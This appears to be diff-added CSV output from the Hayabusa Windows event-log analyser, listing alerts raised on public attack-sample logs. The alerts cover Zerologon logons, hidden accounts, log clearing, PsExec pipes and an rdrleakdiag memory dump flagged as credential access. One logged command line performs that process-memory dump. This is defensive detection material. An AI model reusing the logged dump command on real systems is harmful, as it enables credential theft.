+2020-09-16 04:29:51.517 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff89,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx
+2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107103,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
+2020-09-16 18:31:19.133 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
+2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107104,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
+2020-09-16 18:32:13.647 +09:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx
+2020-09-17 19:57:37.013 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
+2020-09-17 19:57:44.254 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: 02694W-WIN10 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
+2020-09-17 19:57:44.270 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x853237,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx
+2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
+2020-09-20 06:12:15.920 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
+2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
+2020-09-20 06:14:32.852 +09:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx
+2020-09-21 06:22:24.799 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Local Admin Password Setting Changed | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F4\ForcePasswordReset: Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-C6C1-5F67-0000-0010A65D0000,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon_13_Local_Admin_Password_Changed.evtx
+2020-09-24 01:49:26.469 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52246 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:49:41.578 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:49:44.353 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 3276 | PGUID: 83989F29-7CA8-5F6B-1201-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:49:44.380 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 7096 | PGUID: 83989F29-7CA8-5F6B-1301-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer:  | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:16.697 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1136e95,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:16.702 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:16.703 +09:00,01566s-win16-ir.threebeesco.com,18,medium,,Pipe Connected_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,../hayabusa-rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:16.892 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted | LID: 0x3e5 | PID: 6868 | PGUID: 83989F29-7CC8-5F6B-2101-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer:  | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:17.194 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1137987,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:17.200 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx
+2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50106 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:18.302 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50107 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:19.821 +09:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\wermgr.exe -upload | Process: C:\Windows\System32\wermgr.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 4248 | PGUID: 83989F29-7CCB-5F6B-2301-000000000301,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:27.599 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52249 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:50:45.506 +09:00,01566s-win16-ir.threebeesco.com,17,medium,,Pipe Created_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: C:\Windows\System32\svchost.exe | PID: 6924 | PGUID: 83989F29-7CC9-5F6B-2201-000000000301,../hayabusa-rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-24 01:51:27.552 +09:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52264 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx
+2020-09-27 22:19:54.244 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.250 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.257 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.264 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.272 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\atsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.286 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.293 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\eventlog | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.299 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\InitShutdown | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.314 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.322 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\LSM_API_service | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.328 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.343 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.350 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ROUTER | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.364 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\scerpc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.371 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.377 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\tapsrv | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.385 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\trkwks | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:19:54.399 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:20:11.245 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:20:11.247 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
+2020-09-27 22:42:00.726 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:00.969 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:01.092 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:15.033 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: C:\Windows\system32\svchost.exe | PID: 1000 | PGUID: 747F3D96-96B6-5F70-0000-0010E5382E00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:15.525 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-27 22:42:15.530 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
+2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,"Cmd: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap | Process: C:\Windows\System32\rdrleakdiag.exe | User: DESKTOP-PIU87N6\wanwan | Parent Cmd: ""C:\WINDOWS\system32\cmd.exe"" | LID: 0x30b90 | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,Evas,RdrLeakDiag Process Dump,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
+2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,CredAccess,Process Dump via RdrLeakDiag.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
